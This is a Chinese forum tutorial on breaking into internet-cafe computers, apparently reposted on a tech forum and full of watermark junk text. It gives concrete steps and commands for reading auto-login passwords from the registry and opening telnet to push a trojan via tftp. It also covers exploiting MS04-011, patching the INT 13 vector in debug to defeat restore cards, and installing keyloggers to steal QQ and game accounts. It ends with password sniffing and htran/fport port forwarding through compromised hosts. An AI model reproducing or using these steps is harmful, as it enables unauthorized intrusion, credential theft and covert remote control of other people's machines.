万能入侵网吧【菜鸟进】
一. 网吧入侵
: A8 o" ?! ?) s我爱电脑技术社区--打造最好的电脑技术自学交流平台
5 [( Z' l) ~1 Y( p) P2 c; \2 G" Wwww.520diannao.com 入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者windows xp的机器,网管一般都把机子设置为自动登陆! / q6 [' y3 Z5 U/ X" @( [
! y4 m3 z4 r9 Z+ k; L打造最好的电脑自学交流论坛 这样我们开机进入系统的时候登陆窗口一闪而过!着时候如果我们findfass.exe试图把登陆账号密码找出来是不会成功的!因为账号密码根本不在内存中,而findfass.exe通过winlogon的PID号和正确的域名中,在内存寻找好段加了密的内存块(保存着加密过的登陆密码),然后对它进行解密,这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\这个目录下,AutoAdminLogon这一项的键值为1,表示自动登陆。 www.520diannao.com( K% B4 x$ e) V
打造最好的电脑自学交流论坛3 u6 A( Y, ]4 ], x5 z0 T
为1的时候,打开控制面板的用户和密码,会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名,DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能,原理是一样的,不过因为权限的问题,不一定能读出来。这样,密码账号我们都找出来了。而且你要知道,一个网吧的自动登陆密码账号一般都是一样的,而且网管为了方便网虫上网一般把他们设置在管理员组,至少user组。
c6 T4 R' h ^, N0 |- ~0 l n. i打造最好的电脑自学交流论坛
! t$ }, [ ^, \- `3 ?4 A我爱电脑技术论坛 知道了密码账号还愁入侵不了么?网吧机子的server服务一般是禁用的,那我们就不能用ipc入侵了。opentelnet.exe我们也用不了,因为着个也依赖ipc连接,dameware远程控制也不行,道理一样。我们可以用recton着个小巧实用的工具来开telnet,这个工具在win2000下面特别好使。如图1。
* }" j9 t" M1 f我爱电脑技术论坛电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站/ x2 j f. ?! `' O
开了telnet后,我们telnet上去,先在本机打开tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,这样就把我们的木马3721.exe比如radmin传过去了。如图2。再在telnet下面直接运行3721.exe就ok了。 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站8 |. J z% t9 C% _3 F4 Q2 @( m$ K8 X
! _6 Z; [9 M6 A% N1 u+ T我爱电脑技术社区--打造最好的电脑技术自学交流平台 另一个方法就是ms04011漏洞,别以为着个漏洞已经过时了,在网吧这个漏洞还是相当普遍的,许多网吧的网管只会装游戏,重装系统,不重视着写漏洞,懒得打补丁!我们用DSScan扫描192.168.0.1-192.168.0.255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出,一下子就得到了系统权限。 我爱电脑技术论坛3 L; n. y ^/ I) P; ~' v# W
7 Q( M5 G! ~0 o/ s: R# t4 A我爱电脑技术论坛 还有很多入侵方法,你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令,实际上这个工具扫用户账号密码很弱,以前我试过,我用上面第一种方法发现网吧都有一个密码为空的管理员账号,用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱闪电狐——火狐端口扫描器来扫一下网吧主机,第一服务器等。着个扫描器速度很快,扫1到10000端口也要不了几分钟。如果发现服务器开80断口,自然是看是不是架设了网站。再看网站十分有漏洞,想办法传个asp木马上去提升权限。如果发现电影服务器装了serv_u,而且你有了一个账号,可以尝试一下serv_u的溢出。
7 L5 R N/ j( s( ]. b' g3 \我爱电脑技术论坛
& }5 U9 c! N; g 二.网吧木马 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站( b6 Y$ y( p6 A+ ^1 {$ q
! n0 o6 R- h! Y1 K+ M6 }" Q9 ]$ a电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 在网吧安装木马最重要的是把它的还原破了,现在网吧的还原系统一般有3种,即还原卡,还原精灵,冰点还原精灵。硬盘还原卡其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了 - M3 l& s0 A2 b5 m
$ T* Y$ V$ ?! ?% x6 ]- g$ F( M我爱电脑技术社区--打造最好的电脑技术自学交流平台 一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET 我爱电脑技术论坛$ {! o' e! S( k+ M8 m3 H3 P% n0 ^
1 }& y( N t, q' V我爱电脑技术论坛 描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码, 我爱电脑技术社区--打造最好的电脑技术自学交流平台, |3 j! H% n& w3 u/ n
我爱电脑技术论坛0 F, j. q& Q: R
当你AH=2的时,它便会call原始INT 13地址来完成(商周)作.
6 D' B) _# J/ S( M( L3 R电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
( v' c. v9 ~3 ~( K' {* K# {7 v我爱电脑技术社区--打造最好的电脑技术自学交流平台 只要找到原始INT 13入口便可以为所欲为.
" n. m. W- t- i" r
4 F0 o' l0 G; c$ ^2 ^+ I电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 具体过程如下:
1 `/ |( D; P m: \* y3 C o2 nwww.520diannao.com
! O- x1 c& j$ ~ c1 J M打造最好的电脑自学交流论坛 开机过程按住F8键,进入纯dos环境, 注";"后为注释.
6 f! u4 M( D7 s# w- |& T! ]我爱电脑技术社区--打造最好的电脑技术自学交流平台! ]& @9 k. h1 n9 c6 E7 }- O# m
出现提示符c:, 2 a, c! L9 f8 ~/ y- S, _/ r
, B) ?* B: A' I$ Y% jwww.520diannao.com 键入c:\debug,
8 L; ^& a- q+ R0 {' J1 B) E电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
) u# \% q8 r/ y. h: r. l打造最好的电脑自学交流论坛 - a100 www.520diannao.com4 e) t; z% P# z; \8 d
打造最好的电脑自学交流论坛7 }9 e: ?6 l9 X4 v: t3 G
- xor ax,ax
4 A3 l7 g- ]' W& b, m
# f( o0 n u' W# `4 M5 Wwww.520diannao.com - int 13 我爱电脑技术论坛# A8 d/ \5 V" }; O
# o, `* E @8 p! P7 ^+ f k我爱电脑技术社区--打造最好的电脑技术自学交流平台 - int3
; G0 { R8 X+ d电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
/ b3 t& l# Q9 X; L ; 寻找原始的int 13入口. 我爱电脑技术社区--打造最好的电脑技术自学交流平台$ u# }$ }/ v2 H6 p- i: V
( K8 X' K1 d$ u. J% D
然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx 我爱电脑技术社区--打造最好的电脑技术自学交流平台! \' a9 ]8 x/ v+ E/ O8 d* u5 S
打造最好的电脑自学交流论坛, f) `( d9 t1 q( e: w4 o
,后面的指令为:mov dl,80 (练练眼力-。按q退出.
) ~' }# B: ]) R) n8 P打造最好的电脑自学交流论坛www.520diannao.com, w. u. N5 f1 [7 }+ \/ }4 M; \
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。
5 ?1 N5 q+ ^& x; M; x打造最好的电脑自学交流论坛
, L" O5 [ ^: L* A* p' S打造最好的电脑自学交流论坛 例如俺的得到的地址是F000:9A95 我爱电脑技术论坛! z/ W6 B- V4 W2 N3 X$ n* G1 Z
7 Q' D2 \ B% w$ P1 v
再次运行debug ,键入:
J' y3 Y# _$ U) e( V9 x我爱电脑技术论坛
7 C8 _! a/ _6 |www.520diannao.com -e 0:4c 95 9A 00 F0 e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中. www.520diannao.com) X- ?0 w. g- E; E
我爱电脑技术论坛, L+ k5 r% {/ @/ _; `" t4 w5 b) Q
-q
: S5 L% t. s) a3 n) Twww.520diannao.com
- ^4 F W/ P, B" Q电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 注: 填的时候要仔细,填错的话会死机。ok,破解完成.
' B! W" T6 X. ~. _9 q" |我爱电脑技术社区--打造最好的电脑技术自学交流平台www.520diannao.com+ g& f& B2 j5 O0 e- j
这时在提示符c:\键入
9 r6 E0 E4 b$ c电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站我爱电脑技术论坛 v2 P4 C) ] `; m! p$ a
c:\win 打造最好的电脑自学交流论坛; C6 Q# d0 q; s/ c$ ^5 Y
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站) i _) Y- ?0 q# w- z' y
进入windows系统即可,那么这次你在windows系统中的一切(商周)作,随着下一次
* T* z- C4 h, d打造最好的电脑自学交流论坛* T9 T/ [! K: o3 j& R
的启动都会被还原卡存储起来。 www.520diannao.com; ]$ A3 P% G5 U9 v
我爱电脑技术论坛4 q. ?) O6 i A! r
这种办法大家都知道,不过操作起来也有点危险,弄不好启动不了。而且win2000没有dos环境,到底性不行呢?呵呵,我还没有做这个危险的尝试。不过望上有很多关于破解还原卡的工具可以下载,到底什么工具最好使,大家自己测试。 www.520diannao.com& K$ Z1 W& t6 f$ ?# W- Y$ I
/ I3 |0 t4 P7 \" ~; V$ o8 Z打造最好的电脑自学交流论坛 至于还原卡,网上有密码读取器,不过着工具只能在win98下面使用。在win2k下面我们可以用winhex来破解,次方法很奏效, 打造最好的电脑自学交流论坛9 x# w$ X" H8 ~
我爱电脑技术社区--打造最好的电脑技术自学交流平台) I- I7 }7 I1 f$ h2 d% K' m
应该是最好的办法。先随便输个错误的密码,弹出错误窗口后不动,用winhex查找主要内存,找到还原精灵,再搜索我们开始 我爱电脑技术论坛+ h% c1 b% y' ^+ L2 o) V
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站7 m/ Y' U' b0 g" K2 r' z+ z# a
输的错误密码。在错误密码的旁边应该就有正确的密码。我们输入正确的密码转存就行了。这里很简单,就不截图了!
3 V4 v! X+ a$ f打造最好的电脑自学交流论坛www.520diannao.com& t- A( B+ O% x- I% C
至于冰点还原,好像还没有破解办法,这个的确很厉害。不过他有个选项,就是重启多少次后不还原,没事你可以多重启试一下,别把机子整坏了就行。
, g; \8 [3 A' c' }, {) R5 u- R我爱电脑技术社区--打造最好的电脑技术自学交流平台3 R. a5 H, h; J, P3 D) i
破了还原后就装木马了。我们最好装键盘记录或密码截获木马,盗qq,游戏账号,邮箱账号等等。比如密码结巴等工具,也可以
, A& w9 v# F( j8 ]我爱电脑技术论坛
( K c( j) I' A) C8 E2 T% `0 e' t# v, c我爱电脑技术社区--打造最好的电脑技术自学交流平台 把浏览器默认主页设置为你的网页木马。如果网吧的默认主页都是一样,而你有能力入侵了那个网站,在默认主页上挂马那更好! ! @. a# v7 Z1 a: q
打造最好的电脑自学交流论坛# S% C) u' `5 H6 @
三.网吧嗅探。
/ [4 E+ m& \7 r' O) D9 Awww.520diannao.com7 g- A& P! [' f# q( p$ o
如果你想知道网吧某个mm的qq号,那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用于嗅探域网中或本机的pop.smtp.ftp等明文传输的tcp/ip协议密码。格式是 xsiff.exe -pass -hide -log pass.log xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜欢着个,还有个密码监听器,密码监听器用于监听网页的密码,包括网页上的邮箱、论坛、聊天室等等。只需在一台电脑上运行,就可以监听局域网内任意一台电脑登录的账号和密码,并将密码显示、保存,或发送到用户指定的邮箱。我就经常有密码监听器2.4破解版在网吧监听别人 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站8 Z# ]; c9 V1 [! ^5 S8 i: a
% [8 _: ?) p q, s打造最好的电脑自学交流论坛 密码!当然网吧最适合dns欺骗!
8 T' e3 i0 b0 o5 |8 Q打造最好的电脑自学交流论坛打造最好的电脑自学交流论坛5 j) J8 ^* V/ G
四.端口转发。
, d; t* x! s8 \www.520diannao.com
3 I6 r2 }, N( T* z1 E9 j我爱电脑技术论坛 为了能随时随地控制网吧机器,在家也可以!我们最好来个端口转发。首先我们可以用fport.exe(这个工具在angelshell1.0包里面有),格式为fport 但是使用他可以不必安装后门,只需要普通的权限即可执行。网吧服务器一般是win2000server版的,我们趁管理员不注意,给他开3389。如果他的ip为192.168.0.1,我们就在他的命令行下执行fport.exe 3389 myip 9999,这里的myip可以是我们的一只有公网ip的肉鸡。我们再在公网ip的肉鸡上运行FportClient.exe着个是客户端。着样我们登陆公网ip的肉鸡的9999端口就进了网吧主机。在上面看第电影赶什么都行,不被发现就行了,我们动作轻点就行了。我们也可以给网吧主机装代理。就用htran2.4,SocksCap。在网吧主机命令行下上执行htran.exe -install (安装Socks5服务),htran.exe -start (启动Socks5服务),再执行"htran.exe -s -connect 共网肉鸡ip 3389。在自己的共网肉鸡上执行htran.exe -s -listen 3389 5200(监听端口).现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了网吧主机。我们也可以用vidc来映射端口,这个和fport差不多就不多说了
